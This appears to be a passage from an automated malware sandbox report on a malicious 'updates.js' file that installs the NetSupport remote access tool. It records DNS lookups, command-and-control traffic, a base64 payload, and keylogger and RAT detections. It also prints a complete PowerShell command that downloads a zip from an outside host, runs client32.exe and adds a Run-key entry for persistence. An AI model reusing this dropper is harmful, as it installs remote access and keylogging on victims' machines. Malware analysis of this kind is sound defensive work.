                                                                            Jul 16, 2024 22:31:44.206437111 CEST8049732104.26.0.231192.168.2.4
                                                                            Jul 16, 2024 22:31:44.206499100 CEST4973280192.168.2.4104.26.0.231

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jul 16, 2024 22:29:47.769463062 CEST5801253192.168.2.41.1.1.1
                                                                            Jul 16, 2024 22:29:48.775588989 CEST5801253192.168.2.41.1.1.1
                                                                            Jul 16, 2024 22:29:48.858393908 CEST53580121.1.1.1192.168.2.4
                                                                            Jul 16, 2024 22:29:48.858442068 CEST53580121.1.1.1192.168.2.4
                                                                            Jul 16, 2024 22:29:54.265010118 CEST5694853192.168.2.41.1.1.1
                                                                            Jul 16, 2024 22:29:54.276545048 CEST53569481.1.1.1192.168.2.4
                                                                            Jul 16, 2024 22:30:06.109138012 CEST53636061.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jul 16, 2024 22:29:47.769463062 CEST192.168.2.41.1.1.10x3008Standard query (0)dfwreds.comA (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:48.775588989 CEST192.168.2.41.1.1.10x3008Standard query (0)dfwreds.comA (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:54.265010118 CEST192.168.2.41.1.1.10x43d0Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jul 16, 2024 22:29:48.858393908 CEST1.1.1.1192.168.2.40x3008No error (0)dfwreds.com23.227.193.59A (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:48.858442068 CEST1.1.1.1192.168.2.40x3008No error (0)dfwreds.com23.227.193.59A (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:54.276545048 CEST1.1.1.1192.168.2.40x43d0No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:54.276545048 CEST1.1.1.1192.168.2.40x43d0No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                            Jul 16, 2024 22:29:54.276545048 CEST1.1.1.1192.168.2.40x43d0No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • dfwreds.com
                                                                            • 94.158.245.103connection: keep-alivecmd=pollinfo=1ack=1
                                                                            • geo.netsupportsoftware.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.44973023.227.193.59807424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 16, 2024 22:29:48.873991966 CEST75OUTGET /data.php?14991 HTTP/1.1
                                                                            Host: dfwreds.com
                                                                            Connection: Keep-Alive
                                                                            Jul 16, 2024 22:29:49.385452032 CEST1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 16 Jul 2024 20:29:49 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Vary: Accept-Encoding
                                                                            Data Raw: 31 66 35 36 0d 0a 55 45 73 44 42 42 51 41 41 41 41 49 41 42 78 45 56 31 65 64 6e 69 58 6d 4a 6d 77 41 41 4a 43 56 41 51 41 4d 41 41 41 41 59 32 78 70 5a 57 35 30 4d 7a 49 75 5a 58 68 6c 37 48 77 48 65 46 54 46 31 2f 66 5a 39 45 34 4b 41 53 4c 36 55 76 36 67 69 42 4a 42 6b 56 63 49 68 45 41 49 6e 59 54 30 73 70 75 79 32 56 52 71 67 43 53 41 45 41 56 52 2f 30 43 6f 41 6f 49 67 69 68 44 53 4e 79 47 46 6b 74 43 4c 51 42 41 51 61 55 6f 58 70 4b 54 33 6e 67 33 6e 4f 7a 4f 37 6d 77 49 4a 55 6f 4c 79 66 67 2f 6e 37 75 2f 65 6d 54 74 6e 7a 73 79 39 76 7a 4e 6e 5a 6d 35 34 6d 4f 43 78 43 6c 51 42 51 49 32 41 43 4c 41 48 35 47 49 46 66 79 39 2f 45 67 79 36 5a 42 70 41 75 76 61 5a 62 6e 73 45 34 38 39 30 63 77 6f 4b 6e 74 55 31 5a 4f 62 30 77 4a 6e 69 71 56 30 6c 34 6d 6e 54 70 6f 64 32 39 66 58 76 4f 6a 4e 73 57 74 66 67 61 56 31 48 32 44 6c 32 6e 54 72 64 7a 39 39 63 58 31 2b 6e 68 38 4a 47 33 53 6e 4e 51 77 63 54 67 74 63 6f 73 65 74 43 37 5a 72 39 64 49 30 61 55 4c 46 6d 48 37 38 58 74 43 61 54 35 34 2b 73 [TRUNCATED]
                                                                            Data Ascii: 1f56UEsDBBQAAAAIABxEV1edniXmJmwAAJCVAQAMAAAAY2xpZW50MzIuZXhl7HwHeFTF1/fZ9E4KASL6Uv6giBJBkVcIhEAInYT0spuy2VRqgCSAEAVR/0CoAoIgihDSNyGFktCLQBAQaUoXpKT3ng3nOzO7mwIJUoLyfg/n7u/emTtnzsy9vzNnZm54mOCxClQBQI2ACLAH5GIFfy9/Egy6ZBpAuvaZbnsE4890cwoKntU1ZOb0wJniqV0l4mnTpod29fXvOjNsWtfgaV1H2Dl2nTrdz99cX1+nh8JG3SnNQwcTgtcosetC7Zr9dI0aULFmH78XtCaT54+sOcCvZYprOb86BEuCWL3W+jjRBmC8QA22BU9waOy3ikBXoAOgQplwAb/X1ZBODF1B/vSGwMvVQV6uvMIhAX9Zg4NUqNjqK67IdBuuDRcug8neYJboS1VnCBoL5gtglRlddwigPWuW9N6EZ5C/0TcP9Z8TyswDNDwLqD1mwsd8pp84VAzgIpDf4HoajTqKt2FlPnPWTAkonoGeBWbSVaslPf8p00lxCsifjdv7VPCo3nB4La+EOEfmR9q0j5xgONE+eyPlPY8YwukmQuWL8ke4oCl0tYLI4qUag7uHdVk6UjDyy0Oh7ZaPgcHdQ/Xl2bDyBZbdw/RH5ukM7hquMXKBZdfZtUs1SE1vcNfZWkqd5Tb7Jp6wyWZNo6ke2ay0yRa0222TH6a+R4eNV5dJMImKtKhoYrYXIk5EUzXKnMae7bs+TVR6Lc8i92nMpxIOES52ld9b27WZSkPsZEPZlqDVjaAJsKyJXjSl2xPmNLlX3VURU1qQJ7WrAt62jhOspwT7Twv96EOrT8grrMdYj//oQ3O/KVPATGAzJzh04szpEv9Zs8BUZZR/6ITpfmFT/EeLp/lN8R8G4MvuOYaKZ4aGhYyZFjB9GHwtoDvW06dOJZXxwdNIaZyNg62N0iSJg+MIx2tD6gd0/7hgzPIsg7ghJtsCWNSyGSSaNm [TRUNCATED]
                                                                            Jul 16, 2024 22:29:49.385485888 CEST1236INData Raw: 79 4d 46 2f 69 72 39 34 6c 6e 2f 44 44 66 4d 51 50 31 2f 34 76 79 66 79 71 55 47 64 72 77 58 6f 68 53 39 67 55 38 42 69 75 68 72 51 64 51 74 64 44 59 47 76 44 52 5a 30 6f 75 73 35 75 6a 61 76 70 38 56 6e 78 32 79 36 7a 33 79 45 4d 67 75 59 6e 55
                                                                            Data Ascii: yMF/ir94ln/DDfMQP1/4vyfyqUGdrwXohS9gU8BiuhrQdQtdDYGvDRZ0ous5ujavp8Vnx2y6z3yEMguYnU50ZeV96apO19ECuV0fupL7wBy6silkleBRewI+Z8W2cD9HlU/Bj91n7f/Ryv3iluxTw1oqAC3d79TK/V6t3P+klfujW7nv1sr9oFbuz2nl/uJW7m9o5X5sK/f30P2TH1I5kX1XsUYIoXEUq9WY7zSW+qfemF9gR+9
                                                                            Jul 16, 2024 22:29:49.385503054 CEST1236INData Raw: 48 61 7a 65 73 42 6b 32 62 74 77 49 4d 64 39 46 51 75 4b 50 71 79 46 70 79 7a 65 77 64 65 74 57 53 45 78 4d 68 4e 54 55 56 4e 69 31 39 79 44 73 32 37 63 50 54 6d 31 66 43 4b 64 6a 76 34 52 6a 63 63 76 67 64 4e 77 53 75 4a 44 77 42 5a 78 50 57 41
                                                                            Data Ascii: HazesBk2btwIMd9FQuKPqyFpyzewdetWSExMhNTUVNi19yDs27cPTm1fCKdjv4RjccvgdNwSuJDwBZxPWAxX01bA6eRv4FLGRpAd/AKuHIiByqwfoDrre7h2NB5OH9oFv59Ig2snU+HqqQy4fSwO8GI03D+XCYcPH4ZTp07BzfPH4PrFLDh37hxcvXoV7lw+AXmXDsH9q6cg92oW3Ll+EXJuXYL7f16G+7evQe5f16H49nkouX8
                                                                            Jul 16, 2024 22:29:49.385523081 CEST672INData Raw: 7a 6c 7a 54 54 4b 45 66 47 4d 59 30 32 52 45 63 48 44 59 70 4c 44 68 59 6b 61 4d 6a 6d 4f 74 7a 64 54 50 46 70 55 4e 33 30 67 2f 6a 69 75 77 49 5a 69 65 65 5a 55 64 77 4f 4e 66 76 62 4b 62 41 57 35 33 4e 4f 6e 59 50 44 71 4d 53 65 51 31 6c 42 58
                                                                            Data Ascii: zlzTTKEfGMY02REcHDYpLDhYkaMjmOtzdTPFpUN30g/jiuwIZieeZUdwONfvbKbAW53NOnYPDqMSeQ1lBXbi1Ui/d2eFmPEqPbuHhYVyYw1NsKqN9nt3biY9u08KCw0NVSI0dHaYvC5ZCZ3N9Hu/8847nTsrq/X8T2h4+OzWZJ5Cv7dS3unZI3Te7PD54Q2YHS4/WDZ8CdNvKu/0WjB/3vzZ88Pns1/E7PkREXRhKTrmzyf75qT
                                                                            Jul 16, 2024 22:29:49.385540009 CEST1236INData Raw: 32 59 30 72 43 6a 6c 36 56 61 61 30 72 37 43 73 66 48 53 75 6e 53 4b 33 6e 35 2f 58 4b 43 56 4d 50 34 6d 71 70 45 69 5a 67 70 54 2f 4f 46 4b 6b 4b 56 7a 2f 30 4e 35 4d 2b 63 4e 6d 30 44 6b 6a 49 33 4e 2f 61 68 4a 76 49 53 6c 46 4b 75 58 36 4b 56
                                                                            Data Ascii: 2Y0rCjl6Vaa0r7CsfHSunSK3n5/XKCVMP4mqpEiZgpT/OFKkKVz/0N5M+cNm0DkjI3N/ahJvISlFKuX6KVJ25qeUM9Qf6kYTOXL+XOvy+3F4VkEuig284PX1n7oq33svxScxq6b7VLWW96lsj+o6ZhC4j7UAj/FD4OMhI2HoUCv4X6vRMJD2phYjxsOQkbbyPar1CL5HHTVqNIwZMwYmTJgAXnZW4G0/HIaPdaA96kQY6+jB96d
                                                                            Jul 16, 2024 22:29:49.385649920 CEST1236INData Raw: 45 75 45 50 4b 4c 68 2f 48 55 72 75 58 59 57 53 42 39 64 70 6e 33 6f 58 43 6e 4a 75 51 30 45 2b 32 36 2f 65 68 64 7a 38 2b 35 43 66 54 2f 65 4b 63 71 47 6f 71 41 69 4b 53 6f 75 67 6f 69 51 66 38 6b 75 4b 61 63 39 61 44 65 58 6c 35 56 42 58 52 58
                                                                            Data Ascii: EuEPKLh/HUruXYWSB9dpn3oXCnJuQ0E+26/ehdz8+5CfT/eKcqGoqAiKSougoiQf8kuKac9aDeXl5VBXRXvWmkoorq2Dsrp6qKTgUFNTA7K6GsU+9e23U/iR/MXCL0kWLuQn+XkvgL6+vgY/1FXHDhtrNbZ/f37qP9aaznb7UvQ1FKKuMshqbL9+n20Y06/fuP+O69dvzIYI60UpBo3lY1n5jZKg3n3Oym706R1Ucdv66zR9Jrx
                                                                            Jul 16, 2024 22:29:49.385667086 CEST1236INData Raw: 4e 63 31 4f 32 4a 44 58 45 36 69 70 71 52 6b 30 35 45 30 45 4c 4b 39 6d 4b 73 2b 72 64 4e 53 56 35 33 56 51 53 36 32 68 76 77 72 35 2b 2f 77 6a 41 69 38 6f 76 61 42 78 6a 79 68 51 2f 6d 4d 4a 4c 51 45 38 6a 61 69 72 71 32 75 71 71 4b 69 38 6f 61
                                                                            Data Ascii: Nc1O2JDXE6ipqRk05E0ELK9mKs+rdNSV53VQS62hvwr5+/wjAi8ovaBxjyhQ/mMJLQE8jairq2uqqKi8oaqq2uNVhraGytv6moJ39F7jidBQFXQ21hFowVOKpqbmG4SPtbW1h2lpab2S0NHRHWZqoG79ZjuVEZ1f44lor6vyvx31VTr/He8Uj0yMjIxmvf3221kffPBB2Ycffljbr1+/mlcNffr0qRk2YmTNlFHda5eNUqtbOkb
                                                                            Jul 16, 2024 22:29:49.385682106 CEST672INData Raw: 37 39 2b 37 68 2f 66 76 33 73 57 38 6f 6e 4b 38 66 76 34 55 53 6f 4e 36 34 58 59 37 4a 66 39 50 59 5a 50 6d 34 61 69 4a 61 6e 67 69 4e 68 4b 4c 61 68 46 7a 38 67 72 78 48 74 6d 37 66 2b 38 75 5a 75 66 6b 59 58 37 46 51 7a 79 64 74 67 6d 33 32 71
                                                                            Data Ascii: 79+7h/fv3sW8onK8fv4USoN64XY7Jf9PYZPm4aiJangiNhKLahFz8grxHtm7f+8uZufkYX7FQzydtgm32qnQnK35dHY5/wJMoTF+9y717959blNu9z7mFlVi5hIh12FzS9O6SRT7pSL9Bv20006V8z/jnn3/YX7wrPjX+Hd9HxPcNDHeQ69tQPF/2wTAk7FLMLewjPjJwQcPHuCD+/cxv6QSb1w8g0nBvTB6ImC8UP8p7On
                                                                            Jul 16, 2024 22:29:49.385858059 CEST1236INData Raw: 69 48 39 52 6d 2f 50 2f 49 6e 67 70 2f 4c 76 33 77 55 52 33 4c 66 36 75 32 67 53 30 54 34 75 69 64 33 38 71 76 70 48 2f 48 46 6f 44 35 42 42 48 68 57 58 56 65 4f 76 79 57 55 79 6d 50 56 63 4d 7a 65 6b 4a 49 6f 4f 57 62 64 44 39 65 4e 70 48 52 44
                                                                            Data Ascii: iH9Rm/P/Ingp/Lv3wUR3Lf6u2gS0T4uid38qvpH/HFoD5BBHhWXVeOvyWUymPVcMzekJIoOWbdD9eNpHRDtp4sXDyRTbyznHT4Oiynq8cEiKsR4GGEd7zARh623EOqlg2uzW+d8XKeI6CR56zeruoNif7KXg3+Cf4/9F8E/z/wvxX1BaiXn5+ZhLsTmXfKCovAb//P3Xv+HfABPp/jbaQx78Jph8iM0hCh9qAuZXDb6lBPGfm19
                                                                            Jul 16, 2024 22:29:49.385875940 CEST1236INData Raw: 6e 32 4d 4b 43 67 6f 62 66 49 65 6c 69 36 75 66 77 4c 2f 50 30 2f 50 2f 4a 50 79 62 2f 46 73 4f 48 59 71 75 48 6c 37 45 2f 77 66 79 76 32 64 34 47 72 59 4e 52 41 5a 38 33 58 31 57 75 68 4a 4c 4b 64 34 58 6c 35 52 67 55 56 46 52 49 2f 2f 58 4c 68
                                                                            Data Ascii: n2MKCgobfIeli6ufwL/P0/P/JPyb/FsOHYquHl7E/wfyv2d4GrYNRAZ83X1WuhJLKd4Xl5RgUVFRI//XLhL/vYl/4s/LqKEey+8MG4S5D+5hWVUt6cvHuxzEI60lCopKcd9iF25fziXjUB130ho+j+yXlJYTd819oKikFLPv3cXUGf25f0m9jXk91javO9eqRf5Lqh/ioRU+XEcqatfsGVOJ+x0+RsS/BvGv9tz8vwjaiv//Ev/
                                                                            Jul 16, 2024 22:29:49.390364885 CEST1236INData Raw: 34 38 66 34 5a 39 79 50 48 54 73 57 6d 52 38 6f 38 61 7a 38 2f 6c 4f 2b 30 38 43 2f 71 42 2b 6d 65 4f 6e 78 73 64 67 6d 38 4b 62 35 33 41 48 77 51 75 6f 61 50 6e 59 72 57 44 79 6d 47 46 42 4f 6e 4e 62 51 2b 69 7a 6e 39 6d 58 63 4f 65 4d 44 54 4c
                                                                            Data Ascii: 48f4Z9yPHTsWmR8o8az8/lO+08C/qB+meOnxsdgm8Kb53AHwQuoaPnYrWDymGFBOnNbQ+izn9mXcOeMDTLCntbi4I967chqrmZ8oeG9AeQX3l+ObQjDeWZVz/7dtexlx3zu+aQatF2uxvKqK+1HTmEJhHa+f2kNtd8B4igPMF0pKWJvlDTosXUVtH/3Gl+YnTXomo2bt7JSQD0hMnor/F8XL8oVhw4eju6cYl3D+DRTvtw3gbaT


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44973194.158.245.1034437608C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 16, 2024 22:29:54.264338017 CEST220OUTPOST http://94.158.245.103/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.245.103Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                            Data Raw:
                                                                            Data Ascii:


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449732104.26.0.231807608C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jul 16, 2024 22:29:54.308444977 CEST118OUTGET /location/loca.asp HTTP/1.1
                                                                            Host: geo.netsupportsoftware.com
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Jul 16, 2024 22:29:54.986241102 CEST935INHTTP/1.1 200 OK
                                                                            Date: Tue, 16 Jul 2024 20:29:54 GMT
                                                                            Content-Type: text/html; Charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            CF-Ray: 8a44bf40fbfb72b6-EWR
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: private
                                                                            Set-Cookie: ASPSESSIONIDSQQQBSDC=IFPBDAEDNBAFCBIHKENAOEJI; path=/
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                            Vary: Accept-Encoding
                                                                            cf-apo-via: origin,host
                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQgBunYVMWADp8NyCXN9DaMz9ir0PVCnqDu8wtOt%2F1nRDT1KFN%2BEKFprkehrzhd8ageLegEa6Atp2KyF42H1miXYW%2BTZKKgS5qE4nhTeY%2BjY2BFrdhy26YXmGQohUiJggd0HOLHmP1PT2oei"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 1040.7357,-74.17240


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:16:29:40
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                                                            Imagebase:0x7ff7ab6f0000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:16:29:45
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                                                            Imagebase:0x7ff788560000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.1816720389.00000170BABCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:16:29:45
                                                                            Start date:16/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:16:29:52
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2969282587.00000000037E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.2971125252.000000006F160000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.1780896953.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 26%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:7
                                                                            Start time:16:30:05
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1909048492.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1907401442.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000002.1907824908.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000007.00000000.1905398866.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:16:30:13
                                                                            Start date:16/07/2024
                                                                            Path:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe"
                                                                            Imagebase:0x950000
                                                                            File size:103'824 bytes
                                                                            MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.1986528123.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1988466728.00000000111E2000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1987638721.0000000000952000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FFD9B927070 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.1884217270.00007FFD9B920000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B920000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b920000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 97b0bc1dcfaf3c675acf4ebf4086a9df88b213e9f33c525e3039dada1183976c
                                                                              • Instruction ID: 089a709fc95a996a04b2314280f3183cc6cbd3c35f4361e31cab1bb517ee0008
                                                                              • Opcode Fuzzy Hash: 97b0bc1dcfaf3c675acf4ebf4086a9df88b213e9f33c525e3039dada1183976c
